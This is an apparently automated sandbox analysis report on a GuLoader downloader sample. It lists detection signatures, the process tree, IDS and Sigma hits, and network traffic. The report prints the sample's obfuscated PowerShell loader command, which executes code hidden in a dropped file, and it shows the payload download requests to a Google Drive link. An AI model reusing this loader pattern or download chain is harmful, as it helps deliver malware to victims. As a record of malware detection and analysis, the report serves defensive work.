
Windows Analysis Report
YrCSUX2O3I.exe

Overview

General Information

Sample name: YrCSUX2O3I.exe (renamed because the original name is a hash value)
Original sample name: d15433cca1e4b6695379317ef0650e4cf9f07fcd5317b8d84343465f3d9186d8.exe
Analysis ID: 1588371
MD5: 13dccf3d94c8435353a3bf886ca19e7e
SHA1: 52474b83a6ea7cf75d1d4986b32e26d87b7074eb
SHA256: d15433cca1e4b6695379317ef0650e4cf9f07fcd5317b8d84343465f3d9186d8
Tags: exe, GuLoader, signed, user-adrian__luca

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • YrCSUX2O3I.exe (PID: 1460 cmdline: "C:\Users\user\Desktop\YrCSUX2O3I.exe" MD5: 13DCCF3D94C8435353A3BF886CA19E7E)
    • powershell.exe (PID: 7012 cmdline: "powershell.exe" -windowstyle minimized "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(2860,3);.$Fysiologen($Willock)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 3848 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000008.00000002.2577978803.000000000452E000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security
Strings: (none)

    System Summary

    Source: Network Connection; Author: frack113; Data: DestinationIp: 142.250.184.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3848, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49974
    Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7012, TargetFilename: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\YrCSUX2O3I.exe
    Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -windowstyle minimized "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(2860,3);.$Fysiologen($Willock)" , CommandLine: "powershell.exe" -windowstyle minimized "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(2860,3);.$Fysiologen($Willock)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\YrCSUX2O3I.exe", ParentImage: C:\Users\user\Desktop\YrCSUX2O3I.exe, ParentProcessId: 1460, ParentProcessName: YrCSUX2O3I.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(2860,3);.$Fysiologen($Willock)" , ProcessId: 7012, ProcessName: powershell.exe
    Timestamp: 2025-01-11T01:30:44.581109+0100
    SID: 2803270
    Severity: 2
    Classtype: Potentially Bad Traffic
    Source IP: 192.168.2.9
    Source Port: 49974
    Destination IP: 142.250.184.206
    Destination Port: 443
    Protocol: TCP


    AV Detection

    Source: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\YrCSUX2O3I.exe; ReversingLabs: Detection: 57%
    Source: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\YrCSUX2O3I.exe; Virustotal: Detection: 59%
    Source: YrCSUX2O3I.exe; Virustotal: Detection: 59%
    Source: YrCSUX2O3I.exe; ReversingLabs: Detection: 57%
    Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.0% probability
    Source: YrCSUX2O3I.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49974 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.9:49975 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49976 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49978 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49980 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49982 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49986 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49988 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49990 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49994 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49996 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49998 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50002 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50004 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50010 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50012 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50014 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50016 version: TLS 1.2
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exe; Code function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055D5
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exe; Code function: 0_2_00406089 FindFirstFileW,FindClose,0_2_00406089
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exe; Code function: 0_2_00402706 FindFirstFileW,0_2_00402706
    Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network traffic; Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49974 -> 142.250.184.206:443
    Source: global traffic; HTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache
    Source: global traffic; HTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
    Source: global traffic; HTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache | Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global traffic; HTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive | Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global traffic | DNS traffic detected: DNS query: drive.google.com
    Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRVnzEkubO4dxbA2c_lHNNHU3gkwu5Z3a1mx4YHq7MsJCThrEt1Ygk9IlRJd0sRz5pPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:30:45 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-O8EOhVgXzqVX_3tCzStGeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY; expires=Sun, 13-Jul-2025 00:30:45 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSLAr3O-4BZf2vsFb4atsWpQh4euFalnzgm2yvrI01h8FRfh-TqMt56uXAcroKt4cLvKcAJvOMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:30:47 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-3CsUnk7pfy73n0TI3cRNAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTthHzghFAjLo31iEBd0f8rL1r9I933PHGhW0XWEfQngDfehJsponJQcV6GRYOly3lqContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:30:50 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-q-qoYC80koCl7JdYDmO4RQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTN1rVcSYi8FPkd4o5jbhTQyMaGHo5DkWllHrBDAXiGvipyTiOxFPUEEcvSZxp3lm6tuyW5-DMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:30:52 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-V2244LTKCvkr3-H0g9eCxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4FkAEpy9cpXTjGevKEliGRmQk6sLx2PvVkXuOonHF_NsHnSELMAjG2IEQdeq3mrv2AContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:30:55 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ejR7Zf_6k2X81s4YVks1Bg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS43oOuhh8VWKFSSsSK-VS4bQuLCawZpz7hbTmVjepChF9GpZzZ-FT1_ZGV61RnXNzJContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:30:57 GMTContent-Security-Policy: script-src 'nonce-RbIqqbL5A-sM2qw7ErJk9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRi-w3JwOID6ax-YpJ4pSxZDT_qA8ibee2LelrMfP5B3AItsVOVE2eQjQlXrcdvvaOCptnKKokContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:30:59 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-eZqXO2lSHEIBW-PRKOYQvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: YrCSUX2O3I.exe, YrCSUX2O3I.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135941062.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007F99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
    Source: msiexec.exe, 00000008.00000003.2538548894.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2503831860.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2455058177.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=d
    Source: msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
    Source: msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 